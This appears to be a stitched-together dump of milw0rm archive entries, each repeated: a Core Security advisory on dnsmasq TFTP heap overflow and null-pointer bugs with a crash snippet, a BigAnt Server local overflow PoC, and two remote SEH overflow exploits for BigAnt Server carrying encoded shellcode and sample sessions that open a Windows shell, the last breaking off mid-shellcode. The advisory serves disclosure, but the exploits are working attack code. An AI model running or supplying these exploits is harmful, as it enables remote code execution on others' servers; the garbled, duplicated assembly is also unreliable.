channel, and offers its help in obtaining proper CVE numbers, specifying
they also believe a separate number should be assigned to each
vulnerability.
. 2009-08-23:
Core replies to Vincent Danen by sending its gpg key. Core also mentions
separate CVE numbers have already been asked.
. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.
. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.
. 2009-08-31:
The advisory CORE-2009-0820 is published.
10. *References*
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
[2] http://www.isi.edu/in-notes/ien/ien133.txt
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
wa3syAdyXlixVdQhdk5vcK0=
=tfqM
-----END PGP SIGNATURE-----
# milw0rm.com [2009-09-09]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1. *Advisory Information*
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958
3. *Vulnerability Description*
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.
Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.
4. *Vulnerable packages*
. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. dnsmasq 2.50
6. *Vendor Information, Solutions and Workarounds*
If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.
Patches are already available from the software author. Most
distributions should release updates for binary packages soon.
7. *Credits*
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
Herederos de Don Pablo" of Core Security Technologies.
The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.
8. *Technical Description*
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).
/-----------
else if (filename[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, filename, MAXDNAME);
- -----------/
This may cause a heap overflow because 'daemon->namebuff' may already
contain data, namely the configured 'daemon->tftp_prefix' passed to the
daemon via a configuration file.
/-----------
if (daemon->tftp_prefix)
{
if (daemon->tftp_prefix[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
- -----------/
The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.
Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.
/-----------
import sys
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
- -----------/
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:
/-----------
while ((opt = next(&p, end)))
{
if (strcasecmp(opt, "blksize") == 0 &&
(opt = next(&p, end)) &&
!(daemon->options & OPT_TFTP_NOBLOCK))
{
transfer->blocksize = atoi(opt);
if (transfer->blocksize < 1)
transfer->blocksize = 1;
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
transfer->opt_blocksize = 1;
transfer->block = 0;
}
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
!transfer->netascii)
{
transfer->opt_transize = 1;
transfer->block = 0;
}
}
- -----------/
The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
derrefence the null-pointer.
9. *Report Timeline*
. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.
. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms to be working
on a patch. He also informs that he is aware that most home router
distributions have tftp turned off by default, and firewalled, and
suggests this should be mentioned on the advisory. Simon also mentions
that a NULL-pointer dereference bug has also been discovered on that
code, and suggests merging both bugs in the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting package maintainers of dnsmasq for most operating
systems.
. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.
. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer derrefence bug to be included in the advisory are ok. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. Details are sent by him about the new bug so that the
advisory draft can be updated to include it.
. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.
. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team contacts Core in
order to discuss both vulnerabilities by a secure communications
channel, and offers its help in obtaining proper CVE numbers, specifying
they also believe a separate number should be assigned to each
vulnerability.
. 2009-08-23:
Core replies to Vincent Danen by sending its gpg key. Core also mentions
separate CVE numbers have already been asked.
. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.
. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.
. 2009-08-31:
The advisory CORE-2009-0820 is published.
10. *References*
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
[2] http://www.isi.edu/in-notes/ien/ien133.txt
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
wa3syAdyXlixVdQhdk5vcK0=
=tfqM
-----END PGP SIGNATURE-----
# milw0rm.com [2009-09-09]


@ -1,18 +1,18 @@
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]


@ -1,122 +1,122 @@
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]


@ -1,106 +1,106 @@
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
